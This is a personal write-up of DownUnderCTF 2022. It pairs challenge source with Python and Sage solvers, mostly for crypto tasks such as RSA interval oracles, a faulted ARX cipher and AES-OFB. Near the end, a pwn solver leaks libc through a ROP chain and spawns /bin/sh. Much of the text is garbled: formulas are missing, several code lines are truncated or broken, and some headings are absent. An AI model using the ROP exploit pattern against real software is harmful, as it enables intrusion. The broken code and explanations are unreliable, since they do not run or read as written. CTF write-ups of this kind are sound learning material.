DownUnderCTF 2022 Writeup
Mon Sep 26 2022
I participated DownUnderCTF 2022 by myself. The results were 17th/1407.
Here are my write-ups for all crypto challs except kyber. And, since there are many challs, I just paste the solver for the other category than crypto (because I'd like to refer in the future).
1337crypt v3
2 solves
1337crypt-v3.sagefrom Crypto.Util.number import bytes_to_long FLAG = open('./flag.txt', 'rb').read().strip() D = 1337 R = RealField(D) x = randint(1+3*3-7, (1*3*3-7)^(13*3+713+13+3*7+1-3+3-7)) alpha1 = randint(1-3*3-7, 1337*1337) + R(1+3*3-7)/randint(1+3-3-7, 1337*1337) alpha2 = randint(1+3-3+7, 13*37*13*3+7) + R(-1+3*3-7)/randint(1+3*3*7, 1+337+13**37) alpha3 = randint(1-3-3*7, 1+337*133*7) + R(1*3*3-7)/randint(1-3*3+7, 1*33**7+133*7) beta1 = sin(alpha1 * x).n(D) beta2 = cos(alpha2 * x).n(D) beta3 = tan(alpha3 * x).n(D) m = bytes_to_long(FLAG) assert m.bit_length() <= x.bit_length() while m.bit_length() != x.bit_length(): m = (m << (-1+3*3-7)) | randint(13//37, 1337//1337) c = x ^^ m print(f'{alpha1 = }') print(f'{alpha2 = }') print(f'{alpha3 = }') print(f'{beta1 = }') print(f'{beta2 = }') print(f'{beta3 = }') print(f'{c = }')
This chall is to find such that , where are given.
Simple arithmetic shows that:
where are integers. means there exist numerical errors. The rhs of them has 8 patterns in total. This can be searched easily so it's assumed that the rhs of them are , , , respectively in the following.
Those equations are linear with regard to and might be solved by LLL. But it didn't work as it is. Then I used the fact that the flag starts with DUCTF{ and it worked! Remark that the number of 's bits (=778) doesn't equal to one of 's bits (Consider the case that the first few bits are the same between and ).
I used rkm0959's inequality solver.
solve.sagefrom itertools import product from Crypto.Util.number import bytes_to_long, long_to_bytes D = 1337 R = RealField(D) alpha1 = R("382688.000003718840762957370928334219657048504840071252989018263226986883648629049352735765207269589923429068690707732585598417261371285342932900956113960156340065674727873827170594382319143476595475658327786062528588588365234789011569313613560380958047757353077898557461668048835816899156195030884972536360965559815694251787832696791756073796676100126068701864254874470530046373944314078415476327719123") alpha2 = R("15637.0000000000000000000000000000000000000000073407249596755993494633815978948470725770595202532938111233270822656540006827548854086357909099305933838931019150313577619230563069886151776251889782046359224864632667394933146539407828208245853609735993739377148185083846731149980246713157043706328084023440946327661078130241672626606833808343709723838524304060402271919834105020805612169606358017694056416") alpha3 = R("29275.0000000000640306760478159122361364268852615107016525704106080086895615545710184648549454761942179678623356595579867852707677349455538454994245696487465653543975651069930536590338519688676538350247199102639964709439110478379805687129967589534757115196430034251100020849966477333439686322641356763869580696872661554589116735439860643787761928921454825557808884297326088601658418898922938739996904201") beta1 = R("0.965482350590597357930331336732328693322339578742073734517347983738107022900479878437240803728616183527740872166110419707555902612362293470627167159630511997241207746072653515847677991057240464634863174163959352186613630940970393483122090644984824146327516779925585782449367431713140436462716606231926544190865635435305068802789385561809037048381522369403391403353483514563964854636147009339110513969645") beta2 = R("0.919312641039301449759543236755656153255910638284013829633241595979805444268967097520473755994266515165860135737385130077610933382052195648654916587723024832651148703456409500869252608520524821467862378804471336340455738379241087436118861027054778860623168210037730515076872812158198969896476202559290795561594850736319300877512941843333101776445598926887112185986310036903702305697813449195991705718975") beta3 = R("1.14855387625795367637526700157484262696944920546403536701593427303031683808809632650237298251670835767655247021139590568460713791448489530488025769625130549491228701922532851244586550786881004979465956996142194848926889854866759317451072626109337018933249842757205735321771354730486331102478476183417508143532011641972415188172049143718997615501480006657475224101754862855024419523910721536847865397788") c = int(410147178282597490563358436921011911559056890980471832437263575462278293391801513339176053095601892381120900128065883405261553740060812667421703330691706989818136170627205398268591784378546378294977003032555726944174387883621263676222) base1 = arcsin(beta1).n(D) base1_ = (R(pi) - base1).n(D) base2 = arccos(beta2).n(D) base2_ = -base2 base3 = arctan(beta3).n(D) base3_ = base3 - R(pi) # alpha1 * xlsb - k1 * R(2 * pi) == base1 - alpha1 * xmsb # [base1 - alpha1 * xmsb, base2 - alpha2 * xmsb, base3 - alpha3 * xmsb, x] = [x, k1, k2, k3] * mat b1, b2, b3 = [base1_, base2_, base3_] b1, b2, b3 = [base1, base2, base3_ + R(2 * pi)] N = 10 ** 500 # used for RealField var to integer M = 2 ** 1122 # parameter indicating numerical error. get it by doing experiment for k in range(4): # parameter that indicates how many characters are the same between x and m for b1, b2, b3 in product([base1, base1_], [base2, base2_], [base3, base3_]): mat = matrix(ZZ, 4, 4) mat[0, 0] = int(alpha1 * N) mat[1, 0] = int(-R(2 * pi * N)) mat[0, 1] = int(alpha2 * N) mat[2, 1] = int(-R(2 * pi * N)) mat[0, 2] = int(alpha3 * N) mat[3, 2] = int(-R(2 * pi * N)) mat[0, 3] = 1 xmsb = ((bytes_to_long(b"DUCTF{") << (c.bit_length() + 1 + k - 47)) ^^ c) lb = [-M + int(b1 * N - alpha1 * xmsb * N), -M + int(b2 * N - alpha2 * xmsb * N), -M + int(b3 * N - alpha3 * xmsb * N)] + [3] ub = [M + int(b1 * N - alpha1 * xmsb * N), M + int(b2 * N - alpha2 * xmsb * N), M + int(b3 * N - alpha3 * xmsb * N)] + [(1*3*3-7)^(13*3+713+13+3*7+1-3+3-7) // 2**47] # res = solve(mat, lb, ub) try: x_rec = xmsb + int(res[2][0]) for i in range(8): tmp = long_to_bytes(int(c ^^ x_rec) >> i) if b"DUC" in tmp: print(tmp) except: continue
rsa interval oracle i-iv!/usr/bin/env python3 import signal, time from os import urandom, path from Crypto.Util.number import getPrime, bytes_to_long FLAG = open(path.join(path.dirname(__file__), 'flag.txt'), 'r').read().strip() N_BITS = 384 TIMEOUT = 20 * 60 MAX_INTERVALS = 384 MAX_QUERIES = 384 def main(): p, q = getPrime(N_BITS//2), getPrime(N_BITS//2) N = p * q e = 0x10001 d = pow(e, -1, (p - 1) * (q - 1)) secret = bytes_to_long(urandom(N_BITS//9)) c = pow(secret, e, N) print(N) print(c) intervals = [] queries_used = 0 while True: print('1. Add interval\n2. Request oracle\n3. Get flag') choice = int(input('> ')) if choice == 1: if len(intervals) >= MAX_INTERVALS: print('No more intervals allowed!') continue lower = int(input(f'Lower bound: ')) upper = int(input(f'Upper bound: ')) intervals.insert(0, (lower, upper)) elif choice == 2: queries = input('queries: ') queries = [int(c.strip()) for c in queries.split(',')] queries_used += len(queries) if queries_used > MAX_QUERIES: print('No more queries allowed!') continue results = [] for c in queries: m = pow(c, d, N) for i, (lower, upper) in enumerate(intervals): in_interval = lower < m < upper if in_interval: results.append(i) break else: results.append(-1) print(','.join(map(str, results)), flush=True) time.sleep(MAX_INTERVALS * (MAX_QUERIES // N_BITS - 1)) elif choice == 3: secret_guess = int(input('Enter secret: ')) if secret == secret_guess: print(FLAG) else: print('Incorrect secret :(') exit() else: print('Invalid choice') if __name__ == '__main__': signal.alarm(TIMEOUT) main()
The series of these challs are almost the same, except that MAX_INTERVALS and MAX_QUERIES are different.
rsa interval oracle i
79 solves
We can find secret by binary search.
solve.pyfrom pwn import remote io = remote("", 30008) N = int(io.recvline()) c = int(io.recvline()) def add_interval(lb: int, ub: int): io.sendlineafter(b"> ", b"1") io.sendlineafter(b"Lower bound: ", str(lb).encode()) io.sendlineafter(b"Upper bound: ", str(ub).encode()) def query(): io.sendlineafter(b"> ", b"2") io.sendlineafter(b"queries: ", str(c).encode()) return int(io.recvline()) lb = 0 ub = N prev_mid = 0 while True: mid = (lb + ub) // 2 if mid == prev_mid: break prev_mid = mid add_interval(lb, mid) prev_mid = mid if query() == 0: ub = mid else: lb = mid print(mid) io.sendlineafter(b"> ", b"3") io.sendlineafter(b"Enter secret: ", str(mid).encode()) print(io.recvline().strip())
rsa interval oracle ii
36 solves
We can set only 1 interval, and can't use the same method as i.
Let be secret, which we want to find. I set interval to , whose upper bound is smaller than and bigger than secret. Let this upper bound be .
First I tried to find such that and . From this we can say that .
Next I tried to find such that and , where . Accordingly .
Similarly I found such that . By gradually making bigger, we can narrow the range of .
That's not smart...
solve.pyfrom pwn import remote io = remote("", 30011) e = 0x10001 N = int(io.recvline()) c = int(io.recvline()) def add_interval(lb: int, ub: int): io.sendlineafter(b"> ", b"1") io.sendlineafter(b"Lower bound: ", str(lb).encode()) io.sendlineafter(b"Upper bound: ", str(ub).encode()) def query(payload: int): io.sendlineafter(b"> ", b"2") io.sendlineafter(b"queries: ", str(payload).encode()) ret = io.recvline() try: return int(ret) except: return None lb = 0 ub = 2 ** 24 * 256 ** (384 // 9) add_interval(lb, ub) def bisect(lb, ub, sig_lb): prev_mid = None while True: mid = (lb + ub) // 2 if mid == prev_mid: break prev_mid = mid tmp = query(int(pow(mid, e, N) * c)) if tmp is None: return lb, ub elif tmp == 0: if sig_lb == 1: lb = mid else: ub = mid else: if sig_lb == 1: ub = mid else: lb = mid print(lb, ub, mid) return mid thres0 = bisect(0, 2 ** 30, 1) # ub // (thres0 + 1) < secret < ub // thres0 secret_lb = ub // (thres0 + 1) secret_ub = ub // thres0 thres1 = bisect(N // secret_ub, N // secret_lb, -1) # secret * thres1 < N < secret * (thres1 + 1) secret_lb = max(secret_lb, N // (thres1 + 1)) secret_ub = min(secret_ub, N // thres1) for j in range(20, 280, 20): i = 2**j thres = bisect(i * N // secret_ub, i * N // secret_lb, -1) # secret * thres < i * N < secret * (thres + 10) secret_lb = max(secret_lb, i * N // (thres + 10)) secret_ub = min(secret_ub, i * N // thres) i = 2**280 thres = bisect(i * N // secret_ub, i * N // secret_lb, -1) # secret * thres < i * N < secret * (thres + 10) # I don't know why thres + ''10'' secret_lb = max(secret_lb, i * N // (thres[1] + 10)) secret_ub = min(secret_ub, i * N // thres[0]) for i in range(secret_lb, secret_ub + 1): if pow(i, e, N) == c: print(i) io.sendlineafter(b"> ", b"3") io.sendlineafter(b"Enter secret: ", str(i).encode()) print(io.recvline().strip()) break
manger...? I don't know...
rsa interval oracle iii
23 solves
It seems to be easier than ii, but time.sleep(MAX_INTERVALS * (MAX_QUERIES // N_BITS - 1)) prevents me from using the same method as ii. I used the same solver as iv, I skipped explanation here.
rsa interval oracle iv
5 solves
This is the same as iii, but intervals are fixed:
intervals = [(0, 2**(N_BITS - 11)), (0, 2**(N_BITS - 10)), (0, 2**(N_BITS - 9)), (0, 2**(N_BITS - 8))]
It seems that batched queries are required. So I sent query like for many , where is generated randomly. This query shows which interval contains or doesn't contain . When is in one of intervals, intervals[j][0] intervals[j][1], where intervals[j][k] is relatively smaller than . This type of equation might be solved by LLL as you know. My experiments showed that we need over around 50 numbers which are in one of intervals. All I could do was pray... I got the flag by a few trial.
I used rkm0959's inequality solver.
solve.pyfrom collections import Counter from pwn import remote N_BITS = 384 io = remote("", 30030) e = 0x10001 N = int(io.recvline()) c = int(io.recvline()) def add_interval(lb: int, ub: int): io.sendlineafter(b"> ", b"1") io.sendlineafter(b"Lower bound: ", str(lb).encode()) io.sendlineafter(b"Upper bound: ", str(ub).encode()) def query(payload: list[int]): io.sendlineafter(b"> ", b"2") io.sendlineafter(b"queries: ", ",".join(map(str, payload)).encode()) ret = io.recvline().decode().strip() try: return list(map(int, ret.split(","))) except: return None intervals = [(0, 2**(N_BITS - 11)), (0, 2**(N_BITS - 10)), (0, 2**(N_BITS - 9)), (0, 2**(N_BITS - 8))] inp_list = [int(pow(2, randint(0, N - 1), N)) for _ in range(4700)] ret = query([pow(inp, e, N) * c for inp in inp_list]) # 2 ** i * secret - ki * N # [k1, k2, ..., kM, secret] * mat cnt = Counter(ret) M = cnt[0] + cnt[1] + cnt[2] + cnt[3] mat = matrix(ZZ, M+1, M+1) for i in range(M): mat[i, i] = -N mat[M, M] = 1 idx = 0 lb = [] ub = [] for i, b in enumerate(ret): if b != -1: mat[M, idx] = inp_list[i] idx += 1 if b == 0: lb.append(0) ub.append(2**(N_BITS - 11)) elif b == 1: lb.append(2**(N_BITS - 11)) ub.append(2**(N_BITS - 10)) elif b == 2: lb.append(2**(N_BITS - 10)) ub.append(2**(N_BITS - 9)) elif b == 3: lb.append(2**(N_BITS - 9)) ub.append(2**(N_BITS - 8)) else: raise RuntimeError() lb.append(256**41) ub.append(256**42) # res = solve(mat, lb, ub) secret_rec = int(res[2][-1]) io.sendlineafter(b"> ", b"3") io.sendlineafter(b"Enter secret: ", str(secret_rec).encode()) print(io.recvline().strip()) io.close()
faulty arx
11 solves!/usr/bin/env python3 import os import signal import random FLAG = open(os.path.join(os.path.dirname(__file__), 'flag.txt'), 'r').read().strip() def rol(x, d): return ((x << d) | (x >> (32 - d))) & 0xffffffff def bytes_to_words(B): return [int.from_bytes(B[i:i+4], 'little') for i in range(0, len(B), 4)] def words_to_bytes(W): return b''.join([w.to_bytes(4, 'little') for w in W]) class faulty_arx: def __init__(self, key, nonce): self.ROUNDS = 20 self.counter = 0 self.f = 0 self.key = key self.nonce = nonce def _init_state(self, key, nonce, counter): state = bytes_to_words(b'downunderctf2022') state += bytes_to_words(key) state += [counter] + bytes_to_words(nonce) return state def _QR(self, S, a, b, c, d): S[a] = (S[a] + S[b]) & 0xffffffff; S[d] ^= S[a]; S[d] = rol(S[d], 16) S[c] = (S[c] + S[d]) & 0xffffffff; S[b] ^= S[c]; S[b] = rol(S[b], 12 ^ self.f) S[a] = (S[a] + S[b]) & 0xffffffff; S[d] ^= S[a]; S[d] = rol(S[d], 8) S[c] = (S[c] + S[d]) & 0xffffffff; S[b] ^= S[c]; S[b] = rol(S[b], 7) def block(self): initial_state = self._init_state(self.key, self.nonce, self.counter) state = initial_state.copy() for r in range(0, self.ROUNDS, 2): self._QR(state, 0, 4, 8, 12) self._QR(state, 1, 5, 9, 13) self._QR(state, 2, 6, 10, 14) self._QR(state, 3, 7, 11, 15) x = 0 if r == self.ROUNDS - 2: x = random.randint(0, 4) if x == 1: self.f = 1 self._QR(state, 0, 5, 10, 15) self.f = 0 if x == 2: self.f = 1 self._QR(state, 1, 6, 11, 12) self.f = 0 if x == 3: self.f = 1 self._QR(state, 2, 7, 8, 13) self.f = 0 if x == 4: self.f = 1 self._QR(state, 3, 4, 9, 14) self.f = 0 out = [(i + s) & 0xffffffff for i, s in zip(initial_state, state)] self.counter += 1 return words_to_bytes(out) def stream(self, length): out = bytearray() while length > 0: block = self.block() t = min(length, len(block)) out += block[:t] length -= t return out def main(): key = os.urandom(16).hex().encode() nonce = os.urandom(12) print(nonce.hex()) out = set() for _ in range(20): cipher = faulty_arx(key, nonce) out.add( for c in out: print(c) key_guess = input('key> ') if key_guess == key.decode(): print(FLAG) else: print('Incorrect key!') if __name__ == '__main__': signal.alarm(180) main()
We are given 5 outputs. One of them is correct one () and the others contain error in faulty_arx._QR calculation.
First we need to reveal which output is calculated from what . Since args of last 4 faulty_arx._QR call are independent and different S[b] causes different S[a] in ._QR, we can distinguish them by only seeing S[0], S[1], S[2], S[3].
Here consider ._QR funciton. Remark that we know the final S[a] and S[d], because we know initial_state[:4] and initial_state[12: 16]. I paid attention to the following:
S[b] = rol(S[b], 12 ^ self.f) S[a] = (S[a] + S[b]) # S[a] won't change hereafter
This can be described as:
where is the previous S[b] and are the final S[a] and faulted S[a], respectively. Since we know , we can find .
Next I focused on the following:
S[b] ^= S[c] S[b] = rol(S[b], 7) # S[b], S[c] won't change hereafter
This can be described as:
Note that is not affected by self.f.
The fact that key consists of [0-9a-f] narrows the candidate of . There are patterns. For each , I calculated and check whether there are any inconsistencies about that fact again. The number of the candidates are diminished to around 16.
I used the above for each and then found the correct key by full search.
(However, the solver often fails to work... I don't know why...)
solve.pyimport random from binascii import unhexlify from collections import Counter from itertools import product from pwn import remote from z3 import * def rol(x, d): return ((x << d) | (x >> (32 - d))) & 0xffffffff def rol_z3(x, d): return ((x << d) | (LShR(x, 32 - d))) & 0xffffffff def bytes_to_words(B): return [int.from_bytes(B[i:i+4], 'little') for i in range(0, len(B), 4)] def words_to_bytes(W): return b''.join([w.to_bytes(4, 'little') for w in W]) class faulty_arx: def __init__(self, key, nonce): self.ROUNDS = 20 self.counter = 0 self.f = 0 self.key = key self.nonce = nonce def _init_state(self, key, nonce, counter): state = bytes_to_words(b'downunderctf2022') state += bytes_to_words(key) state += [counter] + bytes_to_words(nonce) return state def _QR(self, S, a, b, c, d): S[a] = (S[a] + S[b]) & 0xffffffff; S[d] ^= S[a]; S[d] = rol(S[d], 16) S[c] = (S[c] + S[d]) & 0xffffffff; S[b] ^= S[c]; S[b] = rol(S[b], 12 ^ self.f) S[a] = (S[a] + S[b]) & 0xffffffff; S[d] ^= S[a]; S[d] = rol(S[d], 8) S[c] = (S[c] + S[d]) & 0xffffffff; S[b] ^= S[c]; S[b] = rol(S[b], 7) def block(self, x=None): initial_state = self._init_state(self.key, self.nonce, self.counter) state = initial_state.copy() for r in range(0, self.ROUNDS, 2): self._QR(state, 0, 4, 8, 12) self._QR(state, 1, 5, 9, 13) self._QR(state, 2, 6, 10, 14) self._QR(state, 3, 7, 11, 15) if x is None: x = 0 if r == self.ROUNDS - 2: x = random.randint(0, 4) if x == 1: self.f = 1 self._QR(state, 0, 5, 10, 15) self.f = 0 if x == 2: self.f = 1 self._QR(state, 1, 6, 11, 12) self.f = 0 if x == 3: self.f = 1 self._QR(state, 2, 7, 8, 13) self.f = 0 if x == 4: self.f = 1 self._QR(state, 3, 4, 9, 14) self.f = 0 out = [(i + s) & 0xffffffff for i, s in zip(initial_state, state)] self.counter += 1 return words_to_bytes(out) def stream(self, length, x=None): out = bytearray() while length > 0: block = self.block(x=x) t = min(length, len(block)) out += block[:t] length -= t return out valid_chars = [0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66] io = remote("", 30007) nonce = unhexlify(io.recvline().strip().decode()) enc_list = [] for _ in range(5): enc_list.append(bytes_to_words(unhexlify(io.recvline().strip().decode()))) # words の... # [0] が異なる: x = 1 # [1] が異なる: x = 2 # [2] が異なる: x = 3 # [3] が異なる: x = 4 initial_state = bytes_to_words(b'downunderctf2022') + [None] * 8 + [0] + bytes_to_words(nonce) cnt = Counter(enc[0] for enc in enc_list) enc1 = list(filter(lambda x: x[0] == cnt.most_common()[1][0], enc_list))[0] cnt = Counter(enc[1] for enc in enc_list) enc2 = list(filter(lambda x: x[1] == cnt.most_common()[1][0], enc_list))[0] cnt = Counter(enc[2] for enc in enc_list) enc3 = list(filter(lambda x: x[2] == cnt.most_common()[1][0], enc_list))[0] cnt = Counter(enc[3] for enc in enc_list) enc4 = list(filter(lambda x: x[3] == cnt.most_common()[1][0], enc_list))[0] enc0 = list(filter(lambda x: x not in [enc1, enc2, enc3, enc4], enc_list))[0] def enumerate_cands(enc, enc_fault, a, b, c, d): assert 0 <= a < 4 assert 12 <= d < 16 sa_fault = (enc_fault[a] - initial_state[a]) & 0xffffffff sa = (enc[a] - initial_state[a]) & 0xffffffff diff = (sa_fault - sa) & 0xffffffff # Though there are multiple solutions, I picked one of them. sb12 = BitVec("sb", 32) s = Solver() s.add((rol_z3(sb12, 1) - sb12) & 0xffffffff == diff) s.check() m = s.model() sb12 = m[sb12].as_long() cands = [] for ns in product(valid_chars, repeat=4): keyc = ns[0] * 256**0 + ns[1] * 256**1 + ns[2] * 256**2 + ns[3] * 256**3 sc_last = (enc[c] - keyc) & 0xffffffff sc_last_fault = (enc_fault[c] - keyc) & 0xffffffff sb_last = rol(sb12 ^ sc_last, 7) sb_last_fault = rol(rol(sb12, 1) ^ sc_last_fault, 7) tmp = (enc[b] - sb_last) & 0xffffffff tmp_fault = (enc_fault[b] - sb_last_fault) & 0xffffffff valid = True for i in range(0, 32, 8): if (tmp >> i) & 0xff not in valid_chars: valid = False if tmp != tmp_fault: valid = False if valid: cands.append((tmp, keyc)) return cands key05_list = enumerate_cands(enc0, enc4, 3, 4, 9, 14) key34_list = enumerate_cands(enc0, enc3, 2, 7, 8, 13) key27_list = enumerate_cands(enc0, enc2, 1, 6, 11, 12) key16_list = enumerate_cands(enc0, enc1, 0, 5, 10, 15) for key05, key34, key27, key16 in product(key05_list, key34_list, key27_list, key16_list): key0, key5 = key05 key3, key4 = key34 key2, key7 = key27 key1, key6 = key16 tmp_key = words_to_bytes([key0, key1, key2, key3, key4, key5, key6, key7]) cipher = faulty_arx(tmp_key, nonce) if bytes_to_words(, x=0)) == enc0: print("found!") io.sendlineafter(b"key> ", tmp_key) print(io.recvline().strip()) break io.close()
time locked
18 solves
time-locked.pyfrom hashlib import sha256 from Crypto.Util.Padding import unpad from Crypto.Cipher import AES ct = bytes.fromhex('85534f055c72f11369903af5a8ac64e2f4cbf27759803041083d0417b5f0aaeac0490f018b117dd4376edd6b1c15ba02') p = 275344354044844896633734474527970577743 a = [2367876727, 2244612523, 2917227559, 2575298459, 3408491237, 3106829771, 3453352037] α = [843080574448125383364376261369231843, 1039408776321575817285200998271834893, 712968634774716283037350592580404447, 1166166982652236924913773279075312777, 718531329791776442172712265596025287, 766989326986683912901762053647270531, 985639176179141999067719753673114239] def f(n): if n < len(α): return α[n] n -= len(α) - 1 t = α[::-1] while n > 0: x = sum([a_ * f_ for a_, f_ in zip(a, t)]) % p t = [x] + t[:-1] n -= 1 return t[0] n = 2**(2**1337) key = sha256(str(f(n)).encode()).digest() aes =, AES.MODE_ECB) flag = unpad(aes.decrypt(ct), 16) print(flag.decode())
f(n) is just a linear calculation. This can be described by a matrix as follows:
sagemath can calculate the multiplicative order of by M.multiplicative_order(). So all we need is calculate n = pow(2, 2**1337, order) and f(n)
solve.sagefrom hashlib import sha256 from Crypto.Util.Padding import unpad from Crypto.Cipher import AES ct = bytes.fromhex('85534f055c72f11369903af5a8ac64e2f4cbf27759803041083d0417b5f0aaeac0490f018b117dd4376edd6b1c15ba02') p = 275344354044844896633734474527970577743 a = [2367876727, 2244612523, 2917227559, 2575298459, 3408491237, 3106829771, 3453352037] alpha = [843080574448125383364376261369231843, 1039408776321575817285200998271834893, 712968634774716283037350592580404447, 1166166982652236924913773279075312777, 718531329791776442172712265596025287, 766989326986683912901762053647270531, 985639176179141999067719753673114239] mat = matrix(GF(p), 7, 7) for i in range(7): mat[0, i] = a[i] for i in range(6): mat[i+1, i] = 1 t = vector(GF(p), alpha[::-1]) order = mat.multiplicative_order() n = int(pow(2, 2**1337, order)) fn = (mat ** (n - 6) * t)[0] key = sha256(str(fn).encode()).digest() aes =, AES.MODE_ECB) flag = unpad(aes.decrypt(ct), 16) print(flag.decode())
cheap ring theory
101 solves
crt.sagep = 55899879511190230528616866117179357211 V = GF(p)^3 R.<x> = PolynomialRing(GF(p)) f = x^3 + 36174005300402816514311230770140802253*x^2 + 35632245244482815363927956306821829684*x + 10704085182912790916669912997954900147 Q = R.quotient(f) def V_pow(A, n): return V([a^n for a in list(A)]) n, m = randint(1, p), randint(1, p) A = Q.random_element() B = Q.random_element() C = A^n * B^m print(' '.join(map(str, list(A)))) print(' '.join(map(str, list(B)))) print(' '.join(map(str, list(C)))) phi_A = V(list(map(int, input().split()))) phi_B = V(list(map(int, input().split()))) phi_C = V(list(map(int, input().split()))) check_phi_C = V_pow(phi_A, n).pairwise_product(V_pow(phi_B, m)) if phi_C == check_phi_C: print(open('./flag.txt', 'r').read().strip())
When all inputs are 0, phi_C == check_phi_C...
oracle for block cipher enthusiasts
102 solves!/usr/bin/env python3 from os import urandom, path from Crypto.Cipher import AES FLAG = open(path.join(path.dirname(__file__), 'flag.txt'), 'r').read().strip() MESSAGE = f'Decrypt this... {urandom(300).hex()} {FLAG}' def main(): key = urandom(16) for _ in range(2): iv = bytes.fromhex(input('iv: ')) aes =, iv=iv, mode=AES.MODE_OFB) ct = aes.encrypt(MESSAGE.encode()) print(ct.hex()) if __name__ == '__main__': main()
We can encrypt MESSAGE 2 times for different iv.
I sent iv as 0000.... Since we know the first 16 bytes of MESSAGE, we can find AES(iv) by xor of plaintext and ciphertext (see wikipedia). Next I sent iv as AES(0000...), which is found now.
In general, OFB mode encrypt i-th block of MESSAGE () like:
where is i-th block of given ciphertext. In the situation, we also have
Using these equations . This reveals all from .
solve.pyfrom os import urandom, path from Crypto.Cipher import AES from pwn import remote, unhex, xor io = remote("", 30009) iv1 = "00" * 16 io.sendlineafter(b"iv: ", iv1.encode()) ct1 = unhex(io.recvline().strip().decode()) iv2 = xor(b"Decrypt this... ", ct1[:16]).hex() io.sendlineafter(b"iv: ", iv2.encode()) ct2 = unhex(io.recvline().strip().decode()) dec = b"Decrypt this... " for i in range(16, len(ct1), 16): dec += xor(ct1[i: i+16], ct2[i-16: i], dec[-16:])
baby arx
279 solves
baby-arx.pyclass baby_arx(): def __init__(self, key): assert len(key) == 64 self.state = list(key) def b(self): b1 = self.state[0] b2 = self.state[1] b1 = (b1 ^ ((b1 << 1) | (b1 & 1))) & 0xff b2 = (b2 ^ ((b2 >> 5) | (b2 << 3))) & 0xff b = (b1 + b2) % 256 self.state = self.state[1:] + [b] return b def stream(self, n): return bytes([self.b() for _ in range(n)]) FLAG = open('./flag.txt', 'rb').read().strip() cipher = baby_arx(FLAG) out = print(out) # cb57ba706aae5f275d6d8941b7c7706fe261b7c74d3384390b691c3d982941ac4931c6a4394a1a7b7a336bc3662fd0edab3ff8b31b96d112a026f93fff07e61b
Each element of state is 1 byte. This can be found by full search.
solve.pyfrom binascii import unhexlify out = unhexlify("cb57ba706aae5f275d6d8941b7c7706fe261b7c74d3384390b691c3d982941ac4931c6a4394a1a7b7a336bc3662fd0edab3ff8b31b96d112a026f93fff07e61b") flag = list(b"D") b1 = b"D"[0] for i in range(64): b1 = (b1 ^ ((b1 << 1) | (b1 & 1))) & 0xff for j in range(256): b2 = (j ^ ((j >> 5) | j << 3)) & 0xff if (b1 + b2) & 0xff == out[i]: flag += bytes([j]) break b1 = j print(bytes(flag))
30 solves
solve.pyfrom Crypto.Util.number import long_to_bytes from z3 import * s = Solver() inp_short = [BitVec(f"inp_{hex(i)[2]}", 16) for i in range(16)] for i in range(16): s.add(inp_short[i] & 0xff < 127) s.add(inp_short[i] & 0xff >= 32) s.add(inp_short[i] & 0xff00 < 127 * 256) s.add(inp_short[i] & 0xff00 >= 32 * 256) tmp = 0 for i in range(16): tmp += inp_short[i] s.add(tmp == 0x5dc44) res_add = [] for i in range(16): res_add.append(inp_short[i] + 0x419b) perm_list1 = [3, 1, 0, 6, 7, 4, 3, 1] res_perm1 = [] for p in perm_list1: res_perm1.append(res_add[2 * p]) res_perm1.append(res_add[2 * p + 1]) perm_list2 = [1, 0, 3, 2, 6, 7, 4, 5] res_perm2 = [] for p in perm_list2: res_perm2.append(res_add[2 * p]) res_perm2.append(res_add[2 * p + 1]) res_mul = [] for i in range(16): res_mul.append(res_perm2[i] * res_add[i]) res_sub = [] for i in range(16): res_sub.append(res_mul[i] - res_perm1[i]) target = [0x85765e6f, 0x7b761fa8, 0x5306ec9, 0xbd5d8cfa, 0xc2db0af6, 0x6cf52153, 0xabec2bcd, 0x5c211278] for i, t in enumerate(target): s.add(res_sub[2*i] == (t & 0xffff)) s.add(res_sub[2*i+1] == ((t & 0xffff0000) // 0x10000)) s.check() m = s.model() ans = b"" for i in range(16): ans = long_to_bytes(m[inp_short[i]].as_long())[::-1] + ans
42 solves
solve.pyfrom collections import defaultdict import numpy as np from z3 import * mem = np.array(list("aaaaabbbbcccddaaaaabbbbccccdaaeaaabbbccccdaaefaabbbcccgdeeefffffbccggdfeeffffggggggdfffffffhhhgggdffffhhhhhhgggdffijjjjhkkllmdiiijjkkkkkllmmiijjjkkkklllmmiijjjkkkklllmmijjjjjkknnllmmijjjjnnnnnllll")) mem = mem.reshape(14, 14) inp = [[Int(f"inp_{hex(i)[2]}{hex(j)[2]}") for j in range(14)] for i in range(14)] s = Solver() for i in range(14): for j in range(14): s.add(0 <= inp[i][j]) s.add(inp[i][j] <= 1) for i in range(14): tmp = 0 for j in range(14): tmp += inp[i][j] s.add(tmp == 3) for j in range(14): tmp = 0 for i in range(14): tmp += inp[i][j] s.add(tmp == 3) pos = defaultdict(list) for i in range(14): for j in range(14): pos[mem[i, j]].append((i, j)) for c, pos_list in pos.items(): tmp = 0 for p in pos_list: tmp += inp[p[0]][p[1]] s.add(tmp == 3) loc = [-1, -0xf, -0xe, -0xd, 1, 0xf, 0xe, 0xd] for i in range(14): for j in range(14): for l in loc: if j == 0: tmp = l + 0xf if tmp < 0x1d: continue if j == 13: continue if 0 <= 14*i + j + l < 0xc4: s.add(inp[i][j] + inp[i + (j + l) // 14][(j + l) % 14] <= 1) s.check() m = s.model() ans = [[0 for _ in range(14)] for _ in range(14)] for i in range(14): for j in range(14): ans[i][j] = m[inp[i][j]].as_long() "".join(map(str, sum(ans, []))) # 0101000000001000000101010000101000000001000000000101000110100000000100000010101000000100000000100100001010100000001000000010101000101000000000000000101010010101000000000000000001010100010101000000
33 solves
solve.pyfrom pwn import * # from ezpz-rev ans = b"0101000000001000000101010000101000000001000000000101000110100000000100000010101000000100000000100100001010100000001000000010101000101000000000000000101010010101000000000000000001010100010101000000" io = remote("", 30005) elf = ELF("./ezpz") libc = ELF("./") context.binary = elf payload = ans + b"A" * 0x24 payload += p64(0x00000000004015d3) # pop rdi ; ret payload += p64(0x404018) #"puts") payload += p64(0x004010a0) # elf.symbols["puts"] payload += p64(0x4014a0) # elf.symbols["main"] io.sendline(payload) _ = io.recvline() _ = io.recvline() addr_puts = u64(io.recvline().strip().ljust(8, b"\x00")) libc.address = addr_puts - libc.symbols["puts"] print(f"{libc.address = :#x}") rop = ROP([elf, libc]) rop.execv(next("/bin/sh")), 0) print(rop.dump()) payload = ans + b"A" * 0x24 payload += rop.chain() io.sendline(payload) io.interactive()
71 solves
